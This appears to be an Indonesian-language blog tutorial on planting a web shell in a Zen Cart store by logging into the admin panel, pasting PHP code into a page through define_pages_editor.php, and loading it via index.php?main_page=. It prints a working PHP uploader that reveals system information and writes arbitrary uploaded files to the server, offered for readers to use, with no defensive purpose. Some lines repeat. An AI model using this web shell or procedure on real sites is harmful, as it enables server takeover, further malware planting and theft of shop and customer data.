1.
Login ke page admin .
2. masuk ke file dimana kita bisa mengedit filefile
2. masuk ke file dimana kita bisa mengedit filefile
http://site/path/admin/define_pages_editor.php
|
pilih plain text, dan pilih salah satu file yang mau
kita edit dan masukkan script uploader ato shell kalian
<?php
echo '<b>Jundab<br><br>'.php_uname().'<br></b>';
echo '<form
action="" method="post" enctype="multipart/form-data"
name="uploader" id="uploader">';
echo '<input
type="file" name="file" size="50">
<input name="_upl" type="submit"
id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'],
$_FILES['file']['name']))
{ echo '<b>Upload
Success !!!</b><br><br>'; }
else { echo '<b>Upload Fail
!!!</b><br><br>'; }
}
?>
|
masuk ke file yang kalian pilih tadi melalui index.php
index.php?main_page=$file
|
contoh jika kalian memilih contact_us maka masuk ke
file tersebut sebagai berikut :
index.php?main_page=contact_us
|
Tidak semua zencart bisa di edit filenya, karna sudah
diberikan perm .
Kalaupun bisa diedit, belom tentu juga bisa upload file, karna dir dari path website tersebut di .htaccess atau diberikan permission ;)
Kalaupun bisa diedit, belom tentu juga bisa upload file, karna dir dari path website tersebut di .htaccess atau diberikan permission ;)
0 komentar:
Posting Komentar